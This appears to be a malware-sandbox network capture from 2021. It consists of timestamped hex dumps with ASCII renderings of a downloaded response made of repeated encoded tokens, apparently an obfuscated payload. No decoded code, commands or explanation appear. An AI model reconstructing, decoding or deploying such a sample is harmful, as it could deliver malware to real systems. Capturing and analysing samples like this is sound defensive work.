                                                  2021-10-29 18:30:03 UTC2801INData Raw: 20 4f 4f 52 20 78 20 52 59 20 78 20 74 4f 20 78 20 59 52 20 78 20 52 59 20 78 20 51 78 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 78 6b 20 78 20 52 59 20 78 20 52 6b 20 78 20 4f 4f 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 4f 78 4b 20 78 20 6b 59 20 78 20 74 59 20 78 20 74 74 20 78 20 52 59 20 78 20 4f 6f 4f 20 78 20 6b 4f 20 78 20 52 74 20 78 20 4b 6b 20 78 20 52 59 20 78 20 74 52 20 78 20 6b 51 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 4f 51 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59
                                                  Data Ascii: OOR x RY x tO x YR x RY x Qx x RY x RR x Oxk x RY x Rk x OOO x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x OOQ x RY x OxK x kY x tY x tt x RY x OoO x kO x Rt x Kk x RY x tR x kQ x RY x RR x OOQ x kO x RY x RY
                                                  2021-10-29 18:30:03 UTC2805INData Raw: 6f 20 78 20 74 45 20 78 20 52 59 20 78 20 51 6b 20 78 20 4f 4f 51 20 78 20 52 52 20 78 20 4f 4f 74 20 78 20 52 59 20 78 20 74 4f 20 78 20 4b 6b 20 78 20 52 59 20 78 20 51 78 20 78 20 6b 4f 20 78 20 52 52 20 78 20 4f 4f 74 20 78 20 52 59 20 78 20 74 6f 20 78 20 6b 4f 20 78 20 52 59 20 78 20 74 45 20 78 20 52 59 20 78 20 52 52 20 78 20 6b 4b 20 78 20 52 59 20 78 20 74 6f 20 78 20 6b 4f 20 78 20 52 59 20 78 20 51 51 20 78 20 4f 78 45 20 78 20 52 52 20 78 20 4f 4f 6f 20 78 20 52 59 20 78 20 74 4f 20 78 20 59 6f 20 78 20 52 59 20 78 20 51 78 20 78 20 4f 4f 51 20 78 20 52 52 20 78 20 4f 6f 6f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78
                                                  Data Ascii: o x tE x RY x Qk x OOQ x RR x OOt x RY x tO x Kk x RY x Qx x kO x RR x OOt x RY x to x kO x RY x tE x RY x RR x kK x RY x to x kO x RY x QQ x OxE x RR x OOo x RY x tO x Yo x RY x Qx x OOQ x RR x Ooo x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x
                                                  2021-10-29 18:30:03 UTC2809INData Raw: 78 20 52 59 20 78 20 74 4f 20 78 20 59 52 20 78 20 52 59 20 78 20 51 6b 20 78 20 4f 4f 51 20 78 20 52 52 20 78 20 4f 6f 6f 20 78 20 52 59 20 78 20 74 4f 20 78 20 6b 59 20 78 20 52 59 20 78 20 74 45 20 78 20 52 59 20 78 20 52 52 20 78 20 6b 4f 20 78 20 52 59 20 78 20 74 6f 20 78 20 74 45 20 78 20 52 59 20 78 20 51 6b 20 78 20 4f 4f 51 20 78 20 52 52 20 78 20 4f 78 52 20 78 20 52 59 20 78 20 74 4f 20 78 20 6b 59 20 78 20 52 59 20 78 20 51 51 20 78 20 4f 4f 51 20 78 20 52 52 20 78 20 4f 6f 6f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 74 20 78 20 52 59 20 78 20 52 74 20 78 20 6b 4f 20 78 20 52 59 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 52 20 78 20 6b 4b 20 78 20 6b 4f 20 78 20 52 52 20 78 20 6b 4b 20 78 20 52 59 20 78 20 52 74
                                                  Data Ascii: x RY x tO x YR x RY x Qk x OOQ x RR x Ooo x RY x tO x kY x RY x tE x RY x RR x kO x RY x to x tE x RY x Qk x OOQ x RR x OxR x RY x tO x kY x RY x QQ x OOQ x RR x Ooo x RY x RY x RY x RY x Rt x RY x Rt x kO x RY x kO x RY x RR x kK x kO x RR x kK x RY x Rt
                                                  2021-10-29 18:30:03 UTC2812INData Raw: 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 74 20 78 20 4f 78 6f 20 78 20 52 59 20 78 20 74 78 20 78 20 52 51 20 78 20 52 59 20 78 20 74 74 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 74 51 20 78 20 52 59 20 78 20 74 51 20 78 20 59 52 20 78 20 52 6b 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 45 20 78 20 52 59 20 78 20 52 59 20 78 20 52 74 20 78 20 6b 51 20 78 20 52 59 20 78 20 6b 45 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 4f 6f 20 78 20 52 59 20 78 20 74 4f 20 78 20 6b 4f 20 78 20 52 59 20 78 20 51 78 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 52 20 78 20 6b 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59
                                                  Data Ascii: RY x RY x RY x RY x RY x Rt x Oxo x RY x tx x RQ x RY x tt x OxE x RY x tQ x RY x tQ x YR x Rk x Kt x Kt x KE x RY x RY x Rt x kQ x RY x kE x RY x RR x OOo x RY x tO x kO x RY x Qx x kO x RY x RY x RY x RY x RY x RY x RY x RY x RY x RR x kY x RY x RY x RY
                                                  2021-10-29 18:30:03 UTC2817INData Raw: 6b 20 78 20 52 59 20 78 20 74 6f 20 78 20 74 45 20 78 20 52 59 20 78 20 51 78 20 78 20 6b 4f 20 78 20 52 52 20 78 20 4f 78 4b 20 78 20 52 59 20 78 20 74 6f 20 78 20 6b 4f 20 78 20 52 59 20 78 20 51 78 20 78 20 6b 4f 20 78 20 52 52 20 78 20 4f 78 74 20 78 20 52 59 20 78 20 52 74 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 51 20 78 20 4f 78 45 20 78 20 52 52 20 78 20 59 45 20 78 20 52 59 20 78 20 52 74 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 78 78 20 78 20 6b 4f 20 78 20 52 52 20 78 20 4f 6f 6f 20 78 20 52 59 20 78 20 74 4f 20 78 20 4f 78 74 20 78 20 52 59 20 78 20 51 6b 20 78 20 4f 78 45 20 78 20 52 52 20 78 20 4f 4f 78 20 78 20 52 59 20 78 20 52 52 20 78 20 74 74 20 78 20 52 59 20 78 20 6b 59 20 78 20 4f 4f 51 20 78 20 52 52 20 78 20 4f 78 6b 20 78 20 52
                                                  Data Ascii: k x RY x to x tE x RY x Qx x kO x RR x OxK x RY x to x kO x RY x Qx x kO x RR x Oxt x RY x Rt x RY x RY x kQ x OxE x RR x YE x RY x Rt x RY x RY x Oxx x kO x RR x Ooo x RY x tO x Oxt x RY x Qk x OxE x RR x OOx x RY x RR x tt x RY x kY x OOQ x RR x Oxk x R
                                                  2021-10-29 18:30:03 UTC2821INData Raw: 52 52 20 78 20 59 4b 20 78 20 52 59 20 78 20 74 4f 20 78 20 6b 59 20 78 20 52 59 20 78 20 51 78 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 52 20 78 20 52 51 20 78 20 52 59 20 78 20 6b 4f 20 78 20 6b 4f 20 78 20 52 52 20 78 20 4f 78 74 20 78 20 52 59 20 78 20 74 4f 20 78 20 6b 4f 20 78 20 52 59 20 78 20 74 45 20 78 20 52 59 20 78 20 52 52 20 78 20 74 78 20 78 20 52 59 20 78 20 74 6f 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 51 51 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 4f 59 20 78 20 52 59
                                                  Data Ascii: RR x YK x RY x tO x kY x RY x Qx x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RR x RQ x RY x kO x kO x RR x Oxt x RY x tO x kO x RY x tE x RY x RR x tx x RY x to x OxE x RY x QQ x RY x RR x OOY x RY
                                                  2021-10-29 18:30:03 UTC2825INData Raw: 52 59 20 78 20 51 6b 20 78 20 4f 78 45 20 78 20 52 52 20 78 20 4f 4f 6b 20 78 20 52 59 20 78 20 74 6f 20 78 20 6b 4f 20 78 20 52 59 20 78 20 51 74 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 78 6b 20 78 20 52 59 20 78 20 74 6f 20 78 20 74 45 20 78 20 52 59 20 78 20 74 45 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 4f 59 20 78 20 52 59 20 78 20 74 4f 20 78 20 59 52 20 78 20 52 59 20 78 20 51 78 20 78 20 4f 4f 51 20 78 20 52 52 20 78 20 4f 4f 78 20 78 20 52 59 20 78 20 74 4f 20 78 20 6b 59 20 78 20 52 59 20 78 20 51 78 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 4f 52 20 78 20 52 59 20 78 20 74 4f 20 78 20 4f 78 74 20 78 20 52 59 20 78 20 51 6b 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 74 6f 20 78 20 6b 59 20 78 20 52 59 20 78 20
                                                  Data Ascii: RY x Qk x OxE x RR x OOk x RY x to x kO x RY x Qt x RY x RR x Oxk x RY x to x tE x RY x tE x RY x RR x OOY x RY x tO x YR x RY x Qx x OOQ x RR x OOx x RY x tO x kY x RY x Qx x RY x RY x OOR x RY x tO x Oxt x RY x Qk x OxE x RY x OxE x RY x to x kY x RY x
                                                  2021-10-29 18:30:03 UTC2829INData Raw: 20 78 20 51 6b 20 78 20 4f 4f 51 20 78 20 52 52 20 78 20 59 4f 20 78 20 52 59 20 78 20 74 6f 20 78 20 74 74 20 78 20 52 59 20 78 20 74 45 20 78 20 52 59 20 78 20 52 52 20 78 20 74 51 20 78 20 52 59 20 78 20 74 78 20 78 20 6b 4f 20 78 20 52 59 20 78 20 74 45 20 78 20 52 59 20 78 20 52 59 20 78 20 4b 6b 20 78 20 52 59 20 78 20 52 74 20 78 20 59 6f 20 78 20 52 59 20 78 20 74 74 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 74 78 20 78 20 74 74 20 78 20 52 59 20 78 20 6b 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4b 51 20 78 20 52 59 20 78 20 74 78 20 78 20 52 52 20 78 20 52 52 20 78 20 52 6b 20 78 20 52 59 20 78 20 52 52 20 78 20 6b 6b 20 78 20 52 59 20 78 20 74 4f 20 78 20 4f 78 74 20 78 20 52 59 20 78 20 51 6b 20 78 20 4f 78 45 20
                                                  Data Ascii: x Qk x OOQ x RR x YO x RY x to x tt x RY x tE x RY x RR x tQ x RY x tx x kO x RY x tE x RY x RY x Kk x RY x Rt x Yo x RY x tt x RY x RY x OxE x RY x tx x tt x RY x kY x RY x RY x KQ x RY x tx x RR x RR x Rk x RY x RR x kk x RY x tO x Oxt x RY x Qk x OxE
                                                  2021-10-29 18:30:03 UTC2833INData Raw: 51 51 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 52 51 20 78 20 59 6f 20 78 20 52 59 20 78 20 6b 51 20 78 20 6b 4f 20 78 20 52 52 20 78 20 4f 4f 52 20 78 20 52 59 20 78 20 74 4f 20 78 20 6b 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 74 52 20 78 20 52 59 20 78 20 52 51 20 78 20 74 74 20 78 20 52 59 20 78 20 6b 45 20 78 20 74 4b 20 78 20 4f 4f
                                                  Data Ascii: QQ x OxE x RY x OxE x RY x RQ x Yo x RY x kQ x kO x RR x OOR x RY x tO x kY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x tR x RY x RQ x tt x RY x kE x tK x OO
                                                  2021-10-29 18:30:03 UTC2837INData Raw: 20 78 20 52 52 20 78 20 4f 78 6b 20 78 20 52 59 20 78 20 74 4f 20 78 20 6b 4f 20 78 20 52 59 20 78 20 6b 59 20 78 20 4f 78 45 20 78 20 52 52 20 78 20 4b 51 20 78 20 52 59 20 78 20 74 4f 20 78 20 59 6f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 4f 4f 20 78 20 52 59 20 78 20 52 74 20 78 20 74 45 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 4f 20 78 20 52 52 20 78 20 74 74 20 78 20 52 59 20 78 20 74 4f 20 78 20 6b 59 20 78 20 52 59 20 78 20 51 78 20 78 20 4f 4f 51 20 78 20 52 52 20 78 20 4f 78 4b 20 78 20 52 59 20 78 20 74 4f 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 6b 4f 20 78 20 4f 4f 51 20 78 20 52 52 20 78 20 4f 4f 6b 20 78 20 52 59 20 78 20 74 6f 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 78 4f 20 78 20 6b 4f 20 78 20 52 52 20
                                                  Data Ascii: x RR x Oxk x RY x tO x kO x RY x kY x OxE x RR x KQ x RY x tO x Yo x RY x RY x RY x RR x OOO x RY x Rt x tE x RY x RY x kO x RR x tt x RY x tO x kY x RY x Qx x OOQ x RR x OxK x RY x tO x OOQ x RY x kO x OOQ x RR x OOk x RY x to x RY x RY x OxO x kO x RR
                                                  2021-10-29 18:30:03 UTC2841INData Raw: 78 20 59 78 20 78 20 6b 52 20 78 20 4f 6f 6f 20 78 20 51 51 20 78 20 59 78 20 78 20 59 74 20 78 20 4f 6f 4f 20 78 20 6b 4f 20 78 20 6b 6b 20 78 20 74 4b 20 78 20 4f 78 52 20 78 20 51 74 20 78 20 74 4f 20 78 20 4f 78 6b 20 78 20 4b 6b 20 78 20 51 78 20 78 20 6b 74 20 78 20 74 6b 20 78 20 4b 6b 20 78 20 4f 78 78 20 78 20 6b 6b 20 78 20 74 4b 20 78 20 4f 78 6b 20 78 20 6b 78 20 78 20 6b 45 20 78 20 74 4b 20 78 20 6b 51 20 78 20 74 51 20 78 20 52 6b 20 78 20 6b 51 20 78 20 4f 78 59 20 78 20 74 45 20 78 20 74 6f 20 78 20 52 52 20 78 20 4b 51 20 78 20 6b 51 20 78 20 4f 78 51 20 78 20 4f 6f 78 20 78 20 4f 4f 6f 20 78 20 6b 51 20 78 20 4b 6b 20 78 20 4f 4f 52 20 78 20 4f 78 6b 20 78 20 4f 78 4f 20 78 20 6b 52 20 78 20 6b 6f 20 78 20 4f 4f 6b 20 78 20 51 74 20 78
                                                  Data Ascii: x Yx x kR x Ooo x QQ x Yx x Yt x OoO x kO x kk x tK x OxR x Qt x tO x Oxk x Kk x Qx x kt x tk x Kk x Oxx x kk x tK x Oxk x kx x kE x tK x kQ x tQ x Rk x kQ x OxY x tE x to x RR x KQ x kQ x OxQ x Oox x OOo x kQ x Kk x OOR x Oxk x OxO x kR x ko x OOk x Qt x
                                                  2021-10-29 18:30:03 UTC2844INData Raw: 51 78 20 78 20 4f 78 51 20 78 20 6b 59 20 78 20 59 6f 20 78 20 74 52 20 78 20 6b 74 20 78 20 74 45 20 78 20 59 45 20 78 20 6b 51 20 78 20 6b 4b 20 78 20 6b 59 20 78 20 4f 4f 52 20 78 20 74 6b 20 78 20 52 6b 20 78 20 4f 78 4b 20 78 20 4f 78 51 20 78 20 51 78 20 78 20 52 6b 20 78 20 6b 59 20 78 20 4f 4f 51 20 78 20 6b 51 20 78 20 6b 4b 20 78 20 52 51 20 78 20 4b 51 20 78 20 6b 51 20 78 20 6b 4b 20 78 20 4f 78 6b 20 78 20 4f 78 4b 20 78 20 4f 78 6f 20 78 20 6b 45 20 78 20 74 45 20 78 20 4b 45 20 78 20 6b 78 20 78 20 52 74 20 78 20 59 74 20 78 20 4f 6f 6f 20 78 20 4f 78 78 20 78 20 6b 6b 20 78 20 52 52 20 78 20 4f 4f 51 20 78 20 51 6b 20 78 20 59 4f 20 78 20 74 4b 20 78 20 4b 6b 20 78 20 51 78 20 78 20 6b 74 20 78 20 6b 6f 20 78 20 6b 78 20 78 20 6b 59 20 78
                                                  Data Ascii: Qx x OxQ x kY x Yo x tR x kt x tE x YE x kQ x kK x kY x OOR x tk x Rk x OxK x OxQ x Qx x Rk x kY x OOQ x kQ x kK x RQ x KQ x kQ x kK x Oxk x OxK x Oxo x kE x tE x KE x kx x Rt x Yt x Ooo x Oxx x kk x RR x OOQ x Qk x YO x tK x Kk x Qx x kt x ko x kx x kY x
                                                  2021-10-29 18:30:03 UTC2849INData Raw: 78 20 52 51 20 78 20 74 78 20 78 20 52 51 20 78 20 6b 6f 20 78 20 52 51 20 78 20 4f 78 6b 20 78 20 74 51 20 78 20 6b 6f 20 78 20 4b 51 20 78 20 52 52 20 78 20 52 52 20 78 20 6b 6f 20 78 20 52 51 20 78 20 6b 6f 20 78 20 74 4b 20 78 20 6b 4b 20 78 20 4f 78 74 20 78 20 4f 78 78 20 78 20 6b 51 20 78 20 6b 74 20 78 20 74 78 20 78 20 52 52 20 78 20 52 52 20 78 20 6b 6f 20 78 20 52 51 20 78 20 6b 6f 20 78 20 74 4b 20 78 20 6b 4b 20 78 20 4f 78 74 20 78 20 4f 78 78 20 78 20 6b 4f 20 78 20 6b 4f 20 78 20 6b 59 20 78 20 6b 6f 20 78 20 52 51 20 78 20 6b 45 20 78 20 6b 59 20 78 20 59 45 20 78 20 74 6f 20 78 20 6b 74 20 78 20 74 78 20 78 20 4f 78 4b 20 78 20 6b 4f 20 78 20 6b 4f 20 78 20 6b 59 20 78 20 6b 6f 20 78 20 52 51 20 78 20 6b 45 20 78 20 6b 59 20 78 20 59 45
                                                  Data Ascii: x RQ x tx x RQ x ko x RQ x Oxk x tQ x ko x KQ x RR x RR x ko x RQ x ko x tK x kK x Oxt x Oxx x kQ x kt x tx x RR x RR x ko x RQ x ko x tK x kK x Oxt x Oxx x kO x kO x kY x ko x RQ x kE x kY x YE x to x kt x tx x OxK x kO x kO x kY x ko x RQ x kE x kY x YE
                                                  2021-10-29 18:30:03 UTC2853INData Raw: 59 20 78 20 4f 78 52 20 78 20 52 74 20 78 20 59 78 20 78 20 52 74 20 78 20 59 59 20 78 20 74 52 20 78 20 52 52 20 78 20 4b 51 20 78 20 6b 6f 20 78 20 52 74 20 78 20 4f 78 52 20 78 20 74 4f 20 78 20 59 4f 20 78 20 4f 78 51 20 78 20 74 6b 20 78 20 4f 78 51 20 78 20 4f 4f 51 20 78 20 4b 45 20 78 20 4f 4f 6f 20 78 20 4f 78 51 20 78 20 51 78 20 78 20 4b 51 20 78 20 74 52 20 78 20 4f 78 6b 20 78 20 74 6b 20 78 20 52 52 20 78 20 6b 59 20 78 20 6b 51 20 78 20 74 6f 20 78 20 51 51 20 78 20 4f 4f 6b 20 78 20 4b 6b 20 78 20 59 74 20 78 20 4f 78 51 20 78 20 4f 78 59 20 78 20 52 6b 20 78 20 4f 4f 6b 20 78 20 4f 78 78 20 78 20 4f 4f 74 20 78 20 59 4f 20 78 20 59 45 20 78 20 74 4b 20 78 20 4f 4f 4f 20 78 20 59 4b 20 78 20 6b 45 20 78 20 4f 4f 6f 20 78 20 4b 45 20 78 20
                                                  Data Ascii: Y x OxR x Rt x Yx x Rt x YY x tR x RR x KQ x ko x Rt x OxR x tO x YO x OxQ x tk x OxQ x OOQ x KE x OOo x OxQ x Qx x KQ x tR x Oxk x tk x RR x kY x kQ x to x QQ x OOk x Kk x Yt x OxQ x OxY x Rk x OOk x Oxx x OOt x YO x YE x tK x OOO x YK x kE x OOo x KE x
                                                  2021-10-29 18:30:03 UTC2857INData Raw: 78 20 59 6f 20 78 20 74 4f 20 78 20 52 59 20 78 20 4b 51 20 78 20 6b 59 20 78 20 4f 78 78 20 78 20 52 51 20 78 20 6b 4f 20 78 20 6b 4f 20 78 20 6b 6b 20 78 20 74 74 20 78 20 52 52 20 78 20 6b 74 20 78 20 52 52 20 78 20 52 51 20 78 20 59 4f 20 78 20 74 6b 20 78 20 4b 51 20 78 20 51 51 20 78 20 74 6f 20 78 20 52 52 20 78 20 4f 4f 6b 20 78 20 51 51 20 78 20 4f 4f 78 20 78 20 6b 6f 20 78 20 52 59 20 78 20 51 6b 20 78 20 4f 78 51 20 78 20 4f 78 6b 20 78 20 4f 6f 4f 20 78 20 51 51 20 78 20 59 78 20 78 20 59 74 20 78 20 4f 78 51 20 78 20 4f 78 78 20 78 20 52 74 20 78 20 59 45 20 78 20 4f 4f 74 20 78 20 51 78 20 78 20 6b 6b 20 78 20 6b 4f 20 78 20 4f 4f 51 20 78 20 52 6b 20 78 20 6b 4f 20 78 20 6b 51 20 78 20 74 4b 20 78 20 74 59 20 78 20 4f 4f 4f 20 78 20 51 78
                                                  Data Ascii: x Yo x tO x RY x KQ x kY x Oxx x RQ x kO x kO x kk x tt x RR x kt x RR x RQ x YO x tk x KQ x QQ x to x RR x OOk x QQ x OOx x ko x RY x Qk x OxQ x Oxk x OoO x QQ x Yx x Yt x OxQ x Oxx x Rt x YE x OOt x Qx x kk x kO x OOQ x Rk x kO x kQ x tK x tY x OOO x Qx
                                                  2021-10-29 18:30:03 UTC2861INData Raw: 20 4f 4f 6f 20 78 20 51 78 20 78 20 59 78 20 78 20 59 52 20 78 20 4f 78 45 20 78 20 6b 4b 20 78 20 74 4f 20 78 20 4f 78 6b 20 78 20 4f 4f 52 20 78 20 51 74 20 78 20 6b 6b 20 78 20 6b 6f 20 78 20 4f 78 6b 20 78 20 51 78 20 78 20 52 6b 20 78 20 52 51 20 78 20 4f 78 74 20 78 20 74 74 20 78 20 52 74 20 78 20 74 45 20 78 20 74 4f 20 78 20 52 59 20 78 20 4b 51 20 78 20 6b 59 20 78 20 52 51 20 78 20 52 59 20 78 20 4f 6f 78 20 78 20 74 74 20 78 20 51 6b 20 78 20 6b 59 20 78 20 59 78 20 78 20 6b 52 20 78 20 4f 78 52 20 78 20 4f 78 78 20 78 20 74 4f 20 78 20 4f 78 6b 20 78 20 4f 4f 78 20 78 20 51 6b 20 78 20 4f 6f 4f 20 78 20 52 52 20 78 20 6b 45 20 78 20 6b 59 20 78 20 4b 6b 20 78 20 52 51 20 78 20 4f 78 45 20 78 20 6b 4f 20 78 20 59 78 20 78 20 59 74 20 78 20 4f
                                                  Data Ascii: OOo x Qx x Yx x YR x OxE x kK x tO x Oxk x OOR x Qt x kk x ko x Oxk x Qx x Rk x RQ x Oxt x tt x Rt x tE x tO x RY x KQ x kY x RQ x RY x Oox x tt x Qk x kY x Yx x kR x OxR x Oxx x tO x Oxk x OOx x Qk x OoO x RR x kE x kY x Kk x RQ x OxE x kO x Yx x Yt x O
                                                  2021-10-29 18:30:03 UTC2865INData Raw: 52 6b 20 78 20 52 59 20 78 20 4b 74 20 78 20 52 52 20 78 20 4f 78 45 20 78 20 4f 78 45 20 78 20 4f 4f 4b 20 78 20 52 52 20 78 20 4f 78 45 20 78 20 52 51 20 78 20 74 78 20 78 20 52 52 20 78 20 6b 4f 20 78 20 51 51 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 4f 4f 4f 20 78 20 6b 51 20 78 20 4f 6f 6f 20 78 20 51 74 20 78 20 74 6f 20 78 20 6b 6f 20 78 20 4b 6b 20 78 20 51 51 20 78 20 52 6b 20 78 20 4f 4f 4f 20 78 20 4f 4f 6b 20 78 20 74 52 20 78 20 59 78 20 78 20 74 6b 20 78 20 4f 6f 4f 20 78 20 4f 78 78 20 78 20 52 74 20 78 20 59 45 20 78 20 4b 51 20 78 20 51 51 20 78 20 59 78 20 78 20 6b 52 20 78 20 4f 6f 4f 20 78 20 4f 78 78 20 78 20 74 6f 20 78 20 74 4b 20 78 20 4b 51 20 78 20 51 51 20 78 20 59 4f 20 78 20 6b 4f 20 78 20 4f 4f 74 20 78 20 6b 51 20 78 20 59
                                                  Data Ascii: Rk x RY x Kt x RR x OxE x OxE x OOK x RR x OxE x RQ x tx x RR x kO x QQ x OOQ x RY x OOO x kQ x Ooo x Qt x to x ko x Kk x QQ x Rk x OOO x OOk x tR x Yx x tk x OoO x Oxx x Rt x YE x KQ x QQ x Yx x kR x OoO x Oxx x to x tK x KQ x QQ x YO x kO x OOt x kQ x Y
                                                  2021-10-29 18:30:03 UTC2876INData Raw: 78 20 52 74 20 78 20 52 51 20 78 20 52 6b 20 78 20 4b 6b 20 78 20 51 74 20 78 20 74 6b 20 78 20 6b 6b 20 78 20 74 45 20 78 20 4f 4f 51 20 78 20 74 78 20 78 20 6b 51 20 78 20 74 4b 20 78 20 4f 78 52 20 78 20 74 74 20 78 20 74 6b 20 78 20 52 59 20 78 20 6b 4b 20 78 20 51 51 20 78 20 6b 6b 20 78 20 59 4b 20 78 20 52 74 20 78 20 6b 4f 20 78 20 6b 4f 20 78 20 4f 78 45 20 78 20 4f 4f 51 20 78 20 52 6b 20 78 20 6b 4f 20 78 20 6b 51 20 78 20 74 4b 20 78 20 74 59 20 78 20 4f 4f 4f 20 78 20 51 78 20 78 20 74 45 20 78 20 4f 78 4b 20 78 20 4f 4f 6b 20 78 20 51 51 20 78 20 74 6b 20 78 20 52 59 20 78 20 6b 4f 20 78 20 52 51 20 78 20 74 74 20 78 20 52 52 20 78 20 6b 4f 20 78 20 52 59 20 78 20 4f 4f 51 20 78 20 4f 78 6f 20 78 20 6b 4b 20 78 20 52 51 20 78 20 74 52 20 78
                                                  Data Ascii: x Rt x RQ x Rk x Kk x Qt x tk x kk x tE x OOQ x tx x kQ x tK x OxR x tt x tk x RY x kK x QQ x kk x YK x Rt x kO x kO x OxE x OOQ x Rk x kO x kQ x tK x tY x OOO x Qx x tE x OxK x OOk x QQ x tk x RY x kO x RQ x tt x RR x kO x RY x OOQ x Oxo x kK x RQ x tR x
                                                  2021-10-29 18:30:03 UTC2881INData Raw: 4f 4f 51 20 78 20 59 59 20 78 20 4f 6f 78 20 78 20 4f 6f 78 20 78 20 6b 51 20 78 20 6b 6f 20 78 20 4f 4f 4b 20 78 20 4b 45 20 78 20 6b 78 20 78 20 6b 74 20 78 20 4f 4f 59 20 78 20 6b 52 20 78 20 52 52 20 78 20 4f 4f 78 20 78 20 51 74 20 78 20 51 51 20 78 20 6b 74 20 78 20 74 51 20 78 20 59 74 20 78 20 6b 6b 20 78 20 4f 4f 78 20 78 20 6b 4f 20 78 20 4f 4f 4b 20 78 20 4f 78 6f 20 78 20 4b 45 20 78 20 74 6f 20 78 20 4f 6f 6f 20 78 20 6b 78 20 78 20 4f 78 4b 20 78 20 4b 74 20 78 20 4f 4f 45 20 78 20 4f 4f 6b 20 78 20 4f 78 51 20 78 20 4f 78 59 20 78 20 59 59 20 78 20 6b 74 20 78 20 74 6f 20 78 20 59 6f 20 78 20 4f 6f 4f 20 78 20 74 45 20 78 20 4b 51 20 78 20 4f 4f 6f 20 78 20 59 78 20 78 20 4f 4f 4b 20 78 20 74 6f 20 78 20 4b 6b 20 78 20 6b 59 20 78 20 51 78
                                                  Data Ascii: OOQ x YY x Oox x Oox x kQ x ko x OOK x KE x kx x kt x OOY x kR x RR x OOx x Qt x QQ x kt x tQ x Yt x kk x OOx x kO x OOK x Oxo x KE x to x Ooo x kx x OxK x Kt x OOE x OOk x OxQ x OxY x YY x kt x to x Yo x OoO x tE x KQ x OOo x Yx x OOK x to x Kk x kY x Qx
                                                  2021-10-29 18:30:03 UTC2897INData Raw: 4b 20 78 20 4f 4f 52 20 78 20 6b 52 20 78 20 74 51 20 78 20 52 52 20 78 20 4f 78 74 20 78 20 6b 6b 20 78 20 6b 6b 20 78 20 4f 78 6f 20 78 20 52 59 20 78 20 59 4f 20 78 20 4f 4f 4f 20 78 20 4f 6f 4f 20 78 20 52 74 20 78 20 4f 6f 4f 20 78 20 4b 6b 20 78 20 4f 78 6b 20 78 20 4f 78 4b 20 78 20 52 52 20 78 20 74 4f 20 78 20 4f 6f 4f 20 78 20 4f 4f 59 20 78 20 74 6b 20 78 20 4f 4f 59 20 78 20 4f 4f 45 20 78 20 4f 78 6f 20 78 20 6b 45 20 78 20 4f 4f 4f 20 78 20 74 78 20 78 20 59 74 20 78 20 51 6b 20 78 20 4f 4f 51 20 78 20 59 59 20 78 20 74 4b 20 78 20 4b 74 20 78 20 6b 6f 20 78 20 51 74 20 78 20 4f 4f 4f 20 78 20 74 52 20 78 20 4f 78 6b 20 78 20 74 4b 20 78 20 6b 74 20 78 20 51 78 20 78 20 52 59 20 78 20 4f 4f 6f 20 78 20 51 6b 20 